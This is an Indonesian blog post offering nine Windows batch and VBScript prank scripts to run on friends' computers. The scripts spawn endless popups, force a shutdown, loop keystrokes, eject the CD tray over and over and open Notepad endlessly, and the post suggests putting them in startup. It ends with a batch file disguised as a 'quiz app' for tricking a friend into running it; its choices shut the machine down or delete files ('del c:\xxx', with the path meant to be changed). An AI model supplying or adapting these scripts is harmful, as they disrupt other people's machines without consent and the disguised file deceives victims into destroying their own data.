Bagi Sobat Yang Bingung Cara Download Silahkan Klik DISINI

Bikin 9 script Buat Iseng Pada Teman

Terinspirasi dari kompinya sobat yang bisa yg bikin cd/dvd eject mlulu....
kali ini lughot pengen share script2 lain yg lumayan ngeselin orang...
dan ada yang berguna juga tergantung gimana temen2 modif kata2 nya
bisa di kombinasiin sendiri yah....misal nya di taruh di startup..

buka notepad lalu copy paste script di bawah.....

1.message yang nongol melulu

@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT
ket:
walaupun di kill task manager,masih tetep nongol message nya 
kata2 nya bisa diganti sesuai selera masing2...
apalagi yg sedang jatuh cinta...kasih tuh ke gebetan lu...
di kirain cinta gila...

2.bikin shutdown+message 

@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu standar abis"
save namafile.BAT

3.Mainin Caps Lock button

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
save namafile.vbs

4.buka tutup CD/DVD

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs
ampir mirip ama punya nya habs 

5.bikin vbscript nongol mlulu

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
save namafile.vbs
ket:di task manager full wscript yg lg running 

6.teken tombol backspace mlulu

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
save namafile.vbs

7.otomatis ngetik "lu jelek banget sih" di notepad/word

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek banget sih!!!"
loop
save namafile.vbs

8.buka notepad trus menerus

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih 
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.

9.otomatis buka notepad lalu ngetik apa yg lo mau

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
save namafile.vbs
ket:
ini salah satu script favorit salah satu sobat lughot...dulu pernah digunakan buat nembak cewek pake cara ini..
dia rangkai pake kata2nya...trus durasi ngetik nya juga di lambatin...
nama file nya isihatiku.vbs.. 
angka2 di atas bisa di modif sendiri (durasi nongol notepad/ngetiknya)

Tambahan :
dari script diatas sobat-sobat bisa kembangin aja lagi...misal kayak gini nih

@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
nah script diatas save jadi quiz.bat kasih ke temen..
pura2 aj bilang ad aplikasi kuis...
ket di atas :
kalo pilih 1.otomatis matiin computer
2.format file (terserah file apaan ganti aj dir nya)
3.sama aj kayak pilihan 1  
kata2 di atas di ganti2 aj sesuai selera temen2 

sekian kumpulan script2 yang jail
selamat mencoba. Jika sobat ingin mendownload semua script diatas udah lughot sediakan. Silakan download disini 

1 comment:

  1. Cara ngatasinya gimana gan, kasih cara menghentikannya dong gan takut gak bisa ngembalikannya berabe gan, thanks lughot maju terus bloger Indonesia

    ReplyDelete

Isikan komentar anda pada kolom dibawah ini. Mohon gunakan kata-kata yang sopan. Komentar SPAM, SARA dan sejenisnya tidak akan di tampilkan. Dan laporkan jika ada LINK yang RUSAK atau MATI kami akan memperbaikinya kembali. Terima kasih

Note: Only a member of this blog may post a comment.

Related Posts Plugin for WordPress, Blogger...